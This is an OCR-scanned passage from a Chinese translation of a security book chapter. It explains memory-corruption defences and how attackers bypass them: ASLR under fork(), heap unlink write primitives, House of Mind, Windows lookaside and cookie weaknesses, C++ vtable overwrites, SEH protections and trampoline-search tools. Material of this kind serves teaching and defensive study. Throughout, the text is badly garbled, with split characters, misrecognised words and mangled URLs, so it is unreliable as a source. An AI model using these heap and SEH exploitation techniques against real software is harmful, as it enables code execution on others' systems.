在 UNIX 系 统 上 ， 当 一 个 进程 执行 fork() 函数 时 ， 它 的 内 存 布局 会 被 复制 到 新 的 进程 。 如 
果 其 中 的 一 个 进程 死 了 ， 另 一 个 进程 将 继续 存在 。 滥 用 这 个 ， 攻 击 者 可 以 获得 很 多 信息 ， 
其 至 在 应 用 程序 没有 生成 明显 输出 信息 的 情形 里 也 是 这 样 。 
如 果 漏 洞 允 许 尝 试 几 次 ， 我 们 就 可 以 利用 它 区 分 应 用 程序 是 否 骨 淡 了 。 如 果 给 定 地 址 在 
目标 进程 里 是 可 读 、 可 写 或 未 映射 的 ， 有 时 候 可 以 找 一 个 方法 远程 告 之 。 有 充足 的 时 间 
和 聪明 的 头脑 ， 是 可 以 对 付 远 程 内 存 有 喘 射 。 
OpenBSD 团 队 认 识 到 fork () 不 会 重新 随机 化 内 存 布局 ， 所 以 开始 把 重要 的 应 用 程序 改 成 
重新 执行 自己 来 代替 fork() ， 从 而 强制 每 一 个 新 进程 重新 随机 化 。 

当 ASLR 被 适当 实现 且 与 应 用 程序 集成 时 ， 将 是 一 个 非常 坚固 的 防范 代码 执行 破解 程序 的 保 
护 措 施 ， 然 而 ， 大 多 数 的 操作 系统 并 未 提供 完整 的 解决 方案 ， 从 而 为 准备 潜入 的 攻击 者 留 了 一 鹿 
打开 的 窗户 。 在 编写 破解 程序 的 时 候 ， 寻 找 内 存 里 有 哪些 东西 是 固定 不 变 的 ， 并 识别 哪 块 代码 可 
以 从 已 知 的 位 置 重用 ， 总 是 非常 有 趣 的 。 像 ret2plt 这 样 的 攻击 技术 将 会 重新 恢复 活力 ， 帮 助 我 们 
完成 编写 破解 程序 的 重任 。 


14.1.6 HERR 


缓冲 区 溢出 是 否 可 以 利用 仅 取决 于 保存 在 缓冲 区 后 面 的 东西 ,对 每 个 缓冲 区 溢出 来 说 部 可 能 
有 不 同 的 可 能 性 ， 具 体 要 看 应 用 程序 了 ， 但是， 在 常见 的 情形 里 ， 你 期 望 找到 的 东西 通常 取决 于 
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缓冲 区 在 什么 地 方 。 

当 缓冲 区 在 本 里 的 时 候 ， 通 常 可 以 罚 准 返回 地 址 ， 如 果 它 在 堆 里 ， 常 见 的 破解 技术 是 恶化 由 
库 使 用 的 堆 管理 结构 。 

堆 管 理 孙 数 需要 跟 中 哪些 内 存 块 已经 使 用 了 ,哪些 还 是 空间 的 。 尽管 有 非常 多 的 数据 结构 可 
用 ,但 最 常见 的 仍 是 一 些 记录 未 用 块 以 供 以 后 使 用 的 双向 链表 。 在 Windows、Linux、Solaris、 
AIX 和 其 他 系统 上 ， 存 在 众所周知 的 利用 技术 ， 它 可 以 调节 这 些 链 表 的 恶化 ， 从 而 执行 大 家 所 熟 
知 的 任意 4 字 节 [mirrored] 写 原 语 。 当 从 链表 移 除 被 恶化 的 节点 时 ， 完 成 4 字 节 写 操作 。 再 仔细 看 一 
下 这 种 情形 。 

假设 脆弱 的 应 用 程序 使 用 堆 ， 而 且 在 溢出 的 时 候 有 3 个 空闲 块 A、B、 和 c， 这 3 个 空闲 块 顺序 
存储 在 双向 链表 里 。 每 个 节点 必须 有 指向 下 一 个 和 前 一 个 节点 的 引用 (有 了 时 也 称 为 后 向 和 前 向 链 
接 )， 以 便 维护 这 个 结构 。 


.~>next = A 
A->next = B 
B->next = C 
C->next = . 
.—>prev = C 
C->prev = B 
B->prev = A 
A->prev = ... 


省 略 号 可 能 指向 表 头 或 空闲 块 。 

节点 必须 从 空闲 块 列表 中 移 除 的 情况 有 两 种 。 

D 当 用 户 通 过 malloc () 、Rt1A1llocateHeap () 、new 等 请 求 块 时 。 

a 当 用 户 释放 内 存 里 邻近 空闲 块 的 块 以 将 碎片 减 到 最 小 时 。 

后 一 种 情形 也 被 称 为 接合 或 合并 ， 为 了 执行 这 种 操作 ， 必 须 首先 把 未 用 的 块 从 列表 中 移 除 ， 
把 两 个 块 合成 为 一 个 大 块 ， 然 后 把 新 块 插 回 列表 。 从 链表 里 移 除 节 点 的 操作 通常 被 称 为 
unlink()， 就 像 下 面 的 代码 简 述 的 那样 : 


unlink (node): 
node->prev->next = node->next 
node-»next-»prev = node->prev 


当 操作 B 时 ， 如 果 B 的 节点 结构 没有 被 恶化 ， 它 看 起 来 会 像 下 面 这 样 : 


unlink(B): 
B->prev->next = B->next // A->next = C 
B-»next-»prev = B-»prev // C-»prev = A 


普通 的 位 于 unlink() 的 堆 破 解 技术 由 恶化 的 B->prev 及 带 用 户 控制 数据 的 B->next 组 成 , SE 
际 上 将 把 它们 的 内 容 写 入 彼此 的 内 存 地 址 中 : 
unlink(corrupted B): 
B-»corrupted prev-»next = B-»corrupted next 
B->corrupted_next->prev = B-»corrupted prev 


现在 介绍 保护 机 制 。 
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在 正常 的 双向 链表 里 ， 对 于 链表 里 给 定 的 节点 (例如 B)， 下 一 个 不 变 体 为 : 


B->prev->next == B 

B->next->prev == B 

也 就 是 说 ， 前 一 个 节点 的 下 一 个 节点 必须 是 节点 本 身 ， 反 之 亦 然 。 如 果 不 是 这 样 ， 将 意味 着 
这 个 链表 被 来 自 外 部 的 堆 管理 函数 修改 了 ， 因 此 ， 可 以 假定 存在 堆 恶化 bug。 在 Linux 里 ， 这 将 直 
接 导 致 应 用 程序 异常 中 断 。 但 在 Windows 里 ， 至 少 一 直到 Windows XP SP2， 虽 然 没 有 把 节点 从 列 
表 中 移 除 ， 但 应 用 程序 仍 可 以 继续 执行 。 

Stefan Esser 在 2003 年 12 月 2 日 第 一 次 在 电子 邮件 里 公开 提出 校 验 链表 的 完整 的 想法 一 一 安全 
HJunlink() (http:/marc.info?m=107038246826168)， 他 建议 利用 cookie (或 canary) 保护 堆 结构 ， 
我 们 稍 后 再 来 谈 这 一 话题 。 

显然 , PHP 团 队 在 最 初 一 年 多 的 时 间 里 拒绝 了 Stefan 的 主意 ， 大概 在 Stefan 的 电子 邮件 公开 一 
年 后 ， 它 们 被 整合 到 主流 的 glibc 里 。 随 后 ，Windows XP SP2. Windows 2003 SP1 Windows Vista 
在 诸多 新 保护 措施 中 也 包括 了 类 似 于 安全 unlink() 的 检查 ， 我 们 将 会 在 后 面 进一步 讲解 这 些 新 
的 保护 措施 。 

为 了 了 解 是 否 存在 堆 攻 击 的 机 会 ， 必 须 回 答 两 个 问题 。 

口 有 不 被 安全 unlink() 保 护 的 堆 操 作 吗 ? 

答案 是 一 一 有 。 

在 Linux 里 ， 这 种 情况 实际 上 是 相当 少 的 ， 就 像 Phantasmal Phantasmagoria “The Malloc 
Maleficarum” (http://marc.info?m=112906797705156) 里 的 权威 解释 那样 。 他 的 破解 技术 
不 好 理解 和 执行 。 在 这 里 ， 我 们 将 大 致 看 一 下 被 他 命名 为 House of Mind 的 技术 ， 强 烈 建 
议 你 阅读 整 篇 文章 。 | 

当 需 要 把 一 个 节点 从 链表 里 移 除 时 , 可 以 使 用 unlink() 宏 , 这 个 宏 里 增加 了 安全 unlink() 
检查 。 然 而 ， 当 把 一 个 新 节点 插入 列表 时 ， 并 没有 检查 ， 就 像 The Malloc Maleficarum 里 

解释 的 那样 ， 有 了 时候 攻击 者 可 以 小 心地 恶化 堆 结 构 ， 从 而 把 节点 插入 被 攻击 者 控制 的 伪 

造 的 链表 里 ， 用 指向 攻击 者 控制 的 缓冲 区 的 指针 来 改写 4 字 节 。 

下 面 的 代码 是 把 攻击 者 (p) 控制 的 节点 插入 链表 的 malloc () 代码 。 如 果 满 足 必 要 的 条 件 ， 

攻击 者 可 以 控制 来 自 unsorted_chunks (av) 的 返回 值 : 强制 p 写 入 他 选择 的 位 置 ， 

bck = unsorted_chunks (av) ; 

fwd = bck-»fd; 

p->bk = bck; 

p-»fd = fwd; 

bck->fd = p; // p is written to a user chosen location 

fwd->bk = p; 


代码 里 有 些 地 方 的 链表 被 手动 调整 过 ， 不 过 ， 不 清楚 哪个 地 方 为 破解 留 了 一 扇 门 。 这 篇 
文章 也 解释 了 其 他 的 技巧 ， 这 些 技巧 取决 于 脆弱 程序 的 细节 ， 可 用 于 获得 4 字 节 写 原 语 或 
n 字 节 写 原 语 。 

尽管 这 篇 文章 是 在 glibc-2.3.5 的 时 候 写 的 ， 但 仔细 检查 直到 glipc-2.5 所 引入 的 差异 ， 并 没 
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有 看 到 任何 重大 的 可 以 影响 这 篇 文章 所 描述 的 技术 的 有 效 性 的 改变 。 
最 初 的 测试 显示 ， 利 用 Windows 上 节点 插入 不 受 保护 的 事实 来 获取 一 些 好 处 也 是 有 可 能 
的 。 不 过 ， 还 有 其 他 更 好 的 无 视 安 全 unlink () 检 查 的 技术 。Matt Conover 在 SyScan 2004 
研讨 会 上 ， 在 关于 Windows XP SP2 堆 利用 的 介绍 里 介绍 了 其 中 大 多 数 的 技术 
Chttp:/Avww.cybertech.net/~shOksh0k/projects/winheap/). 
第 一 个 方法 是 创造 不 安全 的 取消 链接 ， 其 原理 是 ， 使 用 将 通过 检查 但 同时 〈 从 列表 中 移 
除 节 点 的 时 候 ) 生成 想 要 的 结果 的 值 改 写 头 部 的 后 向 及 前 向 指针 。Conover 清 晰 闻 述 了 这 
个 技术 一 一 通过 改写 堆 结 构 本 身 最 终 获 得 n 字 节 写 原 语 。 然 而 ， 这 上 需要 按 一 定 的 步骤 并 进 
行 一 些 猜测 〈 包 括 堆 结构 的 基 址 ) 才能 完成 。 在 Windows Vista 上 ， 因 为 堆 地 址 被 随机 化 
了 ， 这 个 攻击 将 不 会 成 功 〈 至 少 不 会 正常 地 工作 )。 
Conover 介 绍 的 另 一 个 方法 是 后 备 列表 中 的 块 改写 ， 由 恶化 后 备 列表 及 二 级 结构 〈 也 用 于 
维护 空闲 块 的 列表 ) 组成。 这 些 列表 是 单独 的 链表 ， 不 包含 任何 安全 检查 。 它 是 非常 普 
通 但 可 靠 的 技术 ， 正 确 使 用 时 也 会 获得 n 字 节 写 原 语 。 
从 Windows XP Service Pack 2 开始 ， 引 入 了 一 个 被 称 为 低 碎片 堆 的 算法 。 虽 然 默 认 没 有 使 
用 它 ， 而 且 在 那个 时 候 ， 几 乎 没有 应 用 程序 选择 它 ， 但 随 着 Vista 的 到 来 ， 情 况 发 生 了 变 
W, Windows Vista 用 低 碎 片 堆 完 全 代替 了 后 备 列表 ， 从 而 使 最 近 的 攻击 不 再 适用 了 。 
提醒 所 有 利用 堆 管 理 算法 和 结构 的 技术 的 人 们 ， 为 了 成 功 完成 可 靠 的 攻击 ， 堆 必须 处 于 
可 控 状 态 ， 而 且 在 恶化 之 后 ， 为 了 获得 内 存 写 原 语 并 执行 代码 ， 有 时 候 必须 执行 一 些 特 
殊 的 操作 。 例 如 ， 后 备 列表 中 的 改写 必须 具备 的 条 件 如 下 。 
下 后 备 列表 里 一 个 空闲 块 的 最 小 值 等 于 给 定 的 大 小 n。(Conover 在 介绍 里 说 需要 两 个 块 ， 
但 其 实 一 个 就 够 了 。) 
a 用 选择 的 地 址 改写 这 个 空 亲 块 的 最 初 字 节 ， 并 把 它 的 标记 设 为 busy， 防 止 它 被 接合 ( 合 
并 )。 

和 在 恶化 之 后 ， 对 Rt1A1llocateHeap (n) 的 第 二 次 调用 将 返回 选择 的 地 址 。 
a 如 果 可 以 控制 应 用 程序 向 第 二 个 缓冲 区 写 的 内 容 ， 就 可 得 到 n 字 节 写 原 语 。 
在 编写 堆 恶 化 利用 程序 的 过 程 中 ， 理 解 应 用 程序 什么 时 候 及 为 什么 调用 malloc() 和 
free()， 并 且 花 时 间 寻 找 分 配 或 取消 分 配 任意 大 小 和 内 容 的 新 内 存 块 ， 是 非常 重要 的 。 
保护 本 身 有 问题 吗 ? 
前 面 提 到 过 ， 当 在 Windows XP SP2 里 发 现 问题 时 ， 如 果 不 立 即 中 止 应 用 程序 ， 堆 将 被 遗 
弃 在 一 个 未 知 的 状态 。 从 安全 性 的 角度 来 看 ， 这 个 决定 不 是 很 明智 ， 测 试 已 经 明白 无 误 
地 演示 了 : 可 以 改写 自由 列表 里 节点 的 前 向 和 后 向 链接 ， 尽 管 这 并 没有 导致 4B 写 原 语 ， 
但 这 样 做 可 以 得 到 非常 有 趣 且 可 预测 的 结果 ， 为 其 他 类 型 的 攻击 打开 了 一 扇 门 。 

为 了 从 缓冲 区 溢出 的 情形 中 保护 堆 ，cookie 是 另 一 个 选择 。Yinrong Huang 在 2003 年 4 月 11 日 
第 一 次 提 到 这 个 想法 (http://marc.info?m=105013144919806), 但 在 2004 年 之 前 ,没有 任何 一 种 主 
流 操作 系统 采用 它 ， 之 后 ， 微 软 公司 在 Windows XP SP2 及 Windows 2003 SP1 里 采用 了 它 。 

在 最 初 的 Windows 实 现 里 ，cookie 是 一 个 8 位 的 任意 值 ， 在 堆 块 涉 的 中 间 位 置 。 当 释放 缓冲 区 
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时 ， 将 检查 它 ， 但 是 像 Matt Conover 在 2004 年 12 月 指出 的 那样 ， 如 果 这 个 cookie 不 正确 ， 
RtlFreeHeap () 将 会 忽略 它 并 退出 ， 不 做 任何 处 理 。 这 使 攻击 者 有 了 用 不 同 cookie 尝 试 的 机 会 ， 
他 可 以 一 直 尝 试 ， 直 到 最 后 磁 到 正确 的 cookie， 然 后 接着 攻击 。 简 而 言 之 ， 在 Windows 里 ， 如 果 
可 以 多 次 尝试 ，cookie 根 本 算 不 上 什么 保护 措施 。 

此 外 ， 因 为 cookie 在 头 部 中 间 ， 它 不 保护 size 及 前 一 个 size 字 段 ， 这 也 为 攻击 者 打开 了 一 扇 
门 。 例 如 ， 我 们 已 经 在 测试 中 校 验 了 ， 如 果 使 size 字 段 大 于 大 块 自由 列表 (Freelist[0]) 里 的 
块 的 size 字 段 ， 它 可 能 会 返回 到 用 户 ， 好 像 它 真 地 更 大 一 些 ， 从 而 导致 内 存 恶 化 。 

自 Windows Vista 开 始 ， 发 生 了 很 多 改变 : 创建 堆 时 将 生成 8 个 任意 字 节 。 这 些 字 节 与 块头 的 
第 一 个 字 节 做 xor 运 算 ， 通 过 xor 的 3 个 首 字 节 并 把 结果 与 第 4 个 字 节 比较 来 校 验 完整 性 ， 就 像 下 面 
从 RtlpCoalesceFreeBlocks () 中 提取 的 代码 所 示 : 


mov eax, [ebx+50h] ; ebx -> Heap. +50 = _HEAP. Encoding 

xor [esi], eax ; esi -> BlockHeader (HEAP ENTRY) 

mov al, [esi+1] ; HEAP ENTRY.Size-l 

xor al, [esi] ; HEAP ENTRY.Size 

xor al, [esi+2] ; HEAP ENTRY.SmallTagIndex 

cmp [esi-3], al ; HEAP ENTRY.SubSegmentCode (Vista) 

jnz no corruption, detected here 

完全 一 样 的 代码 模式 会 被 重复 几 次 , 还 有 另外 的 完整 性 检查 。 这 是 Vista 为 堆 分 配 实现 某 些 等 
级 的 ASLR 之 外 的 措施 。 


尽管 某 些 特殊 的 攻击 点 表面 上 可 能 绕 过 了 Windows Vista 的 堆 保护 ， 但 想 通过 滥用 堆 管 理 结 
构 及 算法 ,进一步 利用 基于 堆 的 缓冲 区 溢出 ， 基 本 上 是 不 可 能 的 。 进 一 步 攻击 更 有 可 能 恶化 应 用 
程序 本 身 的 内 部 数据 ， 不 管 是 某 种 函数 指针 还 是 “ 纯 数 据 ”。 

在 块头 部 里 使 用 cookie 的 另 一 个 实现 乃 思 科 公 司 所 为 ， 正 如 第 13 章 所 介绍 的 。 然 而 ， 因 为 
cookie 是 不 带 NUL 字 符 的 固定 值 ， 把 它们 放 在 那里 不 太 像 是 出 于 安全 性 的 原因 ， 反 而 像 是 检测 堆 
是 否 偶然 被 恶化 了 ， 在 这 种 情形 下 ， 用 浪费 一 些 内 存 的 方法 代替 系统 衣 溃 。 

Lib 也 会 做 一 些 额 外 的 检查 ， 比 如 校 验 块 是 不 是 太 大 了 ， 下 一 个 相 邻 的 块 是 否 有 某 种 意义 ， 
标记 是 否 是 正确 的 ， 但 是 ， 如 果 NUL 字 节 不 是 问题 ， 这 样 的 保护 措施 可 以 被 轻易 绕 过 。 

OpenBSD 团 队 采 用 了 截然 不 同 的 方法 ， 毫 无 疑问 ， 它 在 安全 方面 更 有 效 。 首 先 ， 他 们 总 是 
使 用 被 称 为 phkmalloc 的 实现 ， 与 FreeBSD 一 样 。phkmalloc 不 用 链表 维护 空闲 块 的 列表 (仅仅 是 空 
闲 页 的 列表 )， 更 重要 的 是 ， 通 常 不 会 把 控制 信息 与 用 户 数据 混 为 一 团 。 在 众多 关于 堆 利用 的 文 
章 里 ， 只 有 一 篇 是 关于 phkmalloc 利 用 的 一 一 “BSD Heap Smashing”， 这 是 BBP 在 2003 年 5 月 14 日 
发 表 的 (http://the.org/root/docs/exploit_writing/BSD-heap-smashing.txt)。 然 而 ， 对 今天 的 OpenBSD 
来 说 ， 即 使 有 一 千 篇 文 章 也 不 会 产生 任何 差别 。 

从 3.8 版 本 (http://marc.info?m=112475373731469〉 开 始 ，OpenBSD 的 malloc () 实现 几乎 就 
是 包装 了 的 mmap () 系统 调用 。 这 么 做 的 最 大 好 处 是 ， 因 为 OpenBSD 兑 现 了 ASLR，mmap () 的 返回 
值 被 随机 化 了 ， 此 外 ， 它 明确 禁止 两 个 块 〈 像 由 mmap () 返回 的 ) 相继 位 于 内 存 里 ， 从 而 使 想 通 
过 溢出 内 存 页 的 限制 来 恶化 任何 东西 变 得 不 可 能 。 
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如 果 每 个 nalloc () 调用 生成 的 大 小 都 接近 于 页 边界 〈 例 如 ,在 Intel x86 上 是 4kB), 将 会 浪费 
许多 字 节 ， 因 此 ， 这 个 算法 比 简单 地 调用 mmap () 要 更 复杂 一 些 。 
a 只 有 相同 大 小 的 块 可 能 来 自 同一 内 存 页 。 
口 使 用 一 页 直到 它 没有 空间 容纳 完整 的 块 了 。 当 剩 下 的 空间 不 够 一 块 时 ， 这 些 空间 就 被 浪 
费 了 。 仅 仅 在 块 比 页 大 时 才能 跨越 页 边界 ， 在 这 种 情形 下 ， 它 不 会 和 其 他 的 块 相 邻 。 
ü 当 一 个 块 是 空闲 的 时 ， 它 可 能 会 被 重用 ， 但 块 被 重用 的 顺序 有 一 定 的 随机 性 。 当 页 上 所 
有 的 块 都 被 释放 时 ， 这 一 页 可 能 会 归还 给 OS〔( 因 此， 也 就 不 存在 被 再 次 重用 的 问题 了 )， 
尽管 在 实验 室 里 ， 我 们 并 未 能 验证 这 一 结果 。 
在 OpenBSD 里 ， 恶 化 堆 管 理 结构 取决 于 堆 管 理 代码 中 和 的 bug 或 算法 本 身 ， 而 不 会 因为 应 用 程 
序 bug 依 靠 溢 出 动态 的 缓冲 区 。 投 开 这 一 点 ， 唯 一 的 利用 机 会 是 寻找 溢出 可 达到 的 缓冲 区 中 的 敏 
感应 用 程序 数据 。 然 页， 考虑 到 缓冲 区 大 小 一 样 且 相 邻 的 情况 十 分 罕见 ， 而 不 同 大 小 的 缓冲 区 不 
可 能 相 邻 ， 因 此 ， 尽 管 技术 上 可 以 实现 ， 但 发 现 可 利用 的 情形 的 几率 几乎 为 零 。 
随 着 Linux 和 Windows 的 发 展 ， 必 须 承 认 ， 通 常 通过 堆 管理 结构 恶化 的 堆 利 用 变 得 日 益 困 难 
及 不 可 靠 ， 因 此 最 好 学 习 一 些 其 他 知识 。 
O 有 根本 不 包括 堆 管 理 结构 和 算法 的 堆 攻 击 吗 ? 
可 以 肯定 的 是 ， 随 着 堆 管理 保护 措施 的 增加 ， 它 们 将 变 得 越 来 越 常见 。 
就 像 前 面 所 说 的 ， 缓 冲 区 溢出 是 否 可 以 被 利用 只 取决 于 脆弱 的 缓冲 区 后 保存 的 是 什么 。 
看 一 个 例子 ， 如 果 应 用 程序 把 在 某 些 点 使 用 的 函数 指针 保存 在 被 溢出 的 缓冲 区 之 后 ， 通 
过 改写 这 个 函数 指针 就 可 以 控制 执行 流 了 。 
虽然 函数 指针 是 最 合适 的 例子 , 但 它 目前 还 不 是 C++ 应 用 程序 里 最 常见 的 情形 。 在 大 多 数 
C++ 实 现 里 ， 当 创建 一 个 对 象 实例 时 (例如 在 堆 上 使 用 new)， 保 存在 已 分 配 空间 里 的 位 
于 对 象 的 字段 之 前 的 第 一 个 东西 是 类 指针 ， 它 只 不 过 是 一 个 指向 虚 方法 表 (vtable) 的 
指针 。 这 个 vtable 是 包含 了 类 定义 里 面 所 有 虚拟 方法 〈 更 确切 地 说 是 函数 ) 的 地 址 数组 ， 
尽管 不 需要 把 它 放 在 可 写 的 内 存 里 ， 但 总 是 通过 类 指针 使 用 它 。 因 此 ， 类 指针 就 不 可 避 
免 地 保存 在 对 象 本 身 的 空间 里 ， 也 就 是 保存 在 可 写 的 内 存 里 。 
不 管 是 有 意 还 是 无 意 地 造成 了 堆 错 乱 Cheap massaging)， 使 对 象 位 于 脆弱 的 缓冲 区 之 后 ， 
vtable 都 可 以 指向 攻击 者 选择 的 方法 指针 〈method pointer) MFI. Zia, REAR 
方法 ， 攻 击 者 就 有 机 会 执行 任意 代码 。 
C++ 对 象 的 类 指针 只 是 一 个 例子 ， 而 且 是 十 分 普通 的 一 个 。 当 然 ， 任何 位 于 动态 存储 区 里 
的 敏感 信息 都 会 受到 这 类 攻击 的 影响 。 
当 试 图 通过 应 用 程序 数据 恶化 利用 动态 存储 区 上 的 缓冲 区 溢出 时 ， 控 制 堆 布 局 是 最 重要 
的 。 除 了 研究 大 量 的 脆弱 应 用 程序 外 ， 通 常 没有 更 好 的 方法 ， 而 且 可 能 也 只 有 少数 可 用 。 
破解 程序 作者 的 技艺 在 于 从 稀有 的 和 丈 手 的 资源 中 获取 最 大 的 好 处 。 
只 有 少数 工具 可 用 于 观察 堆 是 怎么 演变 的 。Linux 里 的 Ltrace、Solaris 和 AIX 里 的 truss 可 以 
以 文本 的 方式 查看 对 malloc () 和 其 他 函数 的 调用 。 对 于 Windows， 我 们 推荐 一 个 非常 全 面 
的 工具 一 一 PaiMei (http://pedram.openrce.org/PaiMei)。 男 一 些 工 具 用 图 形 更 好 地 表示 了 堆 
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的 演变 :Heap Vis， 这 是 Pedram Amini 为 OllyDbg 开 发 的 插件 《http://pedram.redhive.com/ 
code/ollydbg_plugins/olly_heap_vis/); heap trace.py， 同 样 是 Pedram 写 的 PaiMai 脚 本 
(http://pedram.redhive.com/PaiMei/heap_trace/); HeapDraw， 这 是 CoreLabs 里 的 一 个 小 组 
(http://oss.corest.com) 开 发 的 ,前 面 两 个 只 能 用 于 Windows, 后 面 的 可 用 于 Windows、Linux、 
Solaris 等 。 l 
人 们 将 会 继续 改进 堆 保护 , 但 是 只 要 内 存 块 可 以 溢出 到 相 邻 的 内 存 块 ,恶化 应 用 程序 数据 就 
总 会 有 机 会 触发 脆弱 应 用 程序 的 异常 特征 。 


14.1.7. Windows SEH 保护 机 制 


站 在 攻击 者 的 角度 ，Windows 里 的 SEH (Structured Exception Handling， 结 构 化 异常 处 理 ) 
机 制 只 不 过 是 一 个 在 基于 栈 的 缓冲 区 溢出 之 后 钩 住 执行 流 的 手段 。 微软 公司 在 发 布 Windows 2000 
SP4 的 时 候 就 认识 到 这 一 点 了 ， 从 那 时 起 ， 他 们 慢 慢 为 这 个 机 制 增加 越 来 越 多 的 保护 ， 直 到 将 其 
变 成 你 今天 在 32 位 Windows Vista 上 看 到 的 那样 〈64 位 的 版 本 完全 不 一 样 )。 

实现 所 有 机 制 的 用 户 模式 代码 都 在 ntdl1 . dl1 的 函数 KiUserExceptionDispatcher () 里 。 
假设 你 有 疑问 ， 或 者 想 了 解 新 版 本 的 Windows 中 有 什么 变化 ， 那 么 它 就 是 你 需要 了 解 的 函数 。 下 
面 的 内 容 总 结 了 当前 版 本 里 的 保护 措施 。 

a 调用 处 理 程序 之 前 把 寄存 器 清 零 。 这 个 保护 措施 可 以 防范 简单 的 跳 床 (trampoline). 

O EXCEPTION_REGISTRATION_RECORD 必 须 放 在 内 存 的 栈 界 限 内 ， 而 且 要 排序 。 这 个 保护 措 
施 可 以 防范 一 些 把 伪造 EXCEPTION_ REGISTRATION _ RECORD 放 在 堆 上 的 利用 技术 。 

O 异常 处 理 程序 不 能 在 栈 上 。 系 统 将 会 把 它 的 地 址 与 保存 在 fts: [4] 及 fs:[8] 里 的 栈 界限 做 
比较 。 如 果 想 跳 到 栈 里 的 代码 ， 只 能 通过 其 他 段 里 的 代码 间接 实现 ， 除 非 硬件 W^X 是 适 
当 的 。 这 个 增强 的 保护 措施 防范 把 代码 放 在 栈 里 ， 然 后 直接 跳 到 它 。 

口 在 Visual Studio 里 用 /safeSEH 编 译 的 PE 二 进 制 ( .EXE、.DLL 等 ) 有 一 个 允许 的 异常 处 理 
程序 列表 。PE 映 像 里 其 余 的 代码 不 能 再 被 用 做 异常 处 理 程 序 。 这 是 为 了 防范 像 
pop-pop-ret 之 类 的 第 二 代 跳 床 ， 它 自 Windows XP SP 2 及 Windows 2003 SP1 以 后 就 存在 
了 。 

a 下 面 的 规则 适用 进程 内 存 里 的 其 他 段 ， 属 于 没有 用 /SafesEH 编 译 的 PE 或 根本 不 属于 任何 
PE. 

下 如 果 下 层 的 微 处 理 器 支持 NX 页 ， 那 么 处 理 程序 上 只 能 位 于 标 为 可 执行 的 内 存 里 。 就 像 在 
14.1.2 节 的 旁 注 里 所 解释 的 那样 。 

s 当 硬 件 不 支持 NX 时 ，ntql1.611 里 的 RtlIsvValidHandler() 代码 使 用 NtQuery- 
VirtualMemory () 找 出 这 页 是 否 被 标记 成 可 执行 ， 这 就 是 我 们 通常 所 说 的 软 W^X。 

m 可 以 这 样 设想 ， 如果 这 页 被 标记 成 不 可 执行 ， 那 么 异常 分 派 代 码 无 论 如 何 都 不 允许 执 
行 。 但 直到 程序 运行 结束 才能 看 到 最 终结 果 。 

在 大 声 抱 乱 异 常 处 理 程序 无 效 之 前 ，RtlIsvalidHandler () 用 ZwQueryInformation- 
Process () 查寻 一 些 全 局 per-process 标 记 。 在 XP SP2 之 前 ， 只 检查 一 个 标记 (Execute- 
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DispatchEnable)， 自 Vista 以 后 ， 必 须 启 用 两 个 标记 (ExecuteDispatchEnablefll 
ImageDispatchEnable) 才 人 允许 映射 成 可 执行 页 的 执行 。 
= 这 个 原理 与 14.1.2 节 的 旁 注 里 介绍 的 硬件 支持 的 WAX 相 同 。 

O 像 第 8 章 所 介绍 的 ， 在 Windows XP SP2 和 Windows 2003 SP1 里 ， 可 以 滥用 一 些 标准 的 异常 
处 理 程序 (特别 是 Visual C++ 的 _except_handler3) 来 执行 代码 。 根据 eEye 的 Ben Nagy 
所 写 的 文章 ¢ http://www.eeye.com/html/resources/newsletters/vice/V120060830,html » 3) 
Visual Studios 里 包括 的 这 些 函数 的 版 本 在 栈 恶化 的 情形 下 会 更 强壮 一些 ， 到 目前 为 目 , 在 
绕 过 这 些 限制 方面 还 没 什 么 新 的 进展 。 

纵 观 现在 所 有 的 SEH 保 护 机 制 ， 在 可 以 控制 指向 异常 处 理 函 数 的 情形 里 ， 很 难 从 
exception-handler-approved 区 里 找到 合适 的 点 。 即 使 这 样 的 地 址 被 列 出 来 了 ， 但 要 寻找 一 个 合适 
的 候选 人 实际 上 也 并 不 容易 。 

当然 ， 如 果 可 以 直接 把 代码 放 在 被 允许 空间 里 的 众所周知 的 内 存 位 置 ， 就 可 以 直接 把 它 设 成 
异常 处 理 程序 。 但 在 大 多 数 情况 下 ， 在 基于 栈 的 缓冲 区 溢出 之 后 的 异常 处 理 程序 很 容易 被 恶化 ， 
你 的 代码 可 能 会 很 不 幸 地 在 栈 里 沉睡 。 需要 使 用 exception-handler-approved 区 里 一 个 小 的 跳 床 (或 
jumpcode) 来 间接 获取 代码 ， 否则 就 需要 通过 其 他 方法 把 代码 注入 其 他 内 存 区 。 

Pop-pop-ret 序 列 也 是 一 个 选择 ， 除 此 之 外 还 有 一 些 。 尽管 可 以 手动 查看 整个 映像 内 存 ， 但 
这 是 非常 愚蠢 的 行为 ， 我 们 可 以 用 计算 机 来 帮助 搜索 ， 毕竟 计算 机 就 是 干 这 一 行 的 。 

可 用 的 工具 有 三 个 ，eEye 的 一 个 小 组 开发 的 EEREAP ( http://research.eeye.com/html/tools/ 
RT20060801-2.html), 2% A Core Security 的 Nicolas Economou 开 发 的 Pdest， 以 及 同样 来 自 Core 的 
panoramix 开 发 的 SEHInspector。 后 两 个 工具 在 http://oss.corest.com 可 以 找到 。 

前 两 个 工具 的 原理 是 一 样 的 ; 先 获得 异常 发 生 瞬 间 的 内 存 快 照 ， 然后 逐条 尝试 指令 ， FRE 
些 将 为 你 的 代码 工作 的 指令 ， 例 如 跳 床 。 看 一 个 简单 的 例子 ， 如 果 你 知道 寄存 器 Eax 指 向 你 的 代 
码 ， 使 用 mp EAX 就 可 以 了 ， 而 且 像 CALL EAX, PUSH EAX-RET. MOV EBX. EAX-JMP EBX 以 及 
无 数 的 代码 组 合 (包括 全 是 类 似 nop 的 代码 的 组 合 ) 也 都 可 以 。 

1. EEREAP 

EERERAP 模 拟 微 处 理 器 处 理 内 存 转 储 ， 但 实际 上 并 不 执行 指令 。 除 了 内 存 转 储 外 ， 还 需要 向 
它 提供 一 个 上 下 文 文件 ， 里 面包 含 定义 的 寄存 器 值 、 内 存 布局 以 及 要 搜索 的 目标 (要 了 解 更 多 
信息 ， 请 仔细 阅读 软件 包 里 包含 的 介绍 及 readme 文 件 )。 下 面 介 绍 一 个 简单 的 EEREAP 脚 本 ， 可 
以 用 它 寻 找 所 有 的 像 异常 处 理 程序 跳 床 那 样 跳 到 代码 的 合适 地 址 〈 像 pop-pop-ret 或 类 似 的 东 
西 ): 

stack: 800h, Rw 

ESP = stack+400h 

EBP = stack+420h 

code:10h, RO, TARGET 

[stack+408h] = code 

[stack+414h] code 


[stack-41ch] = code 
[stack-42ch] = code 
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[stack+444h] = code 
[stack+450h] = code 


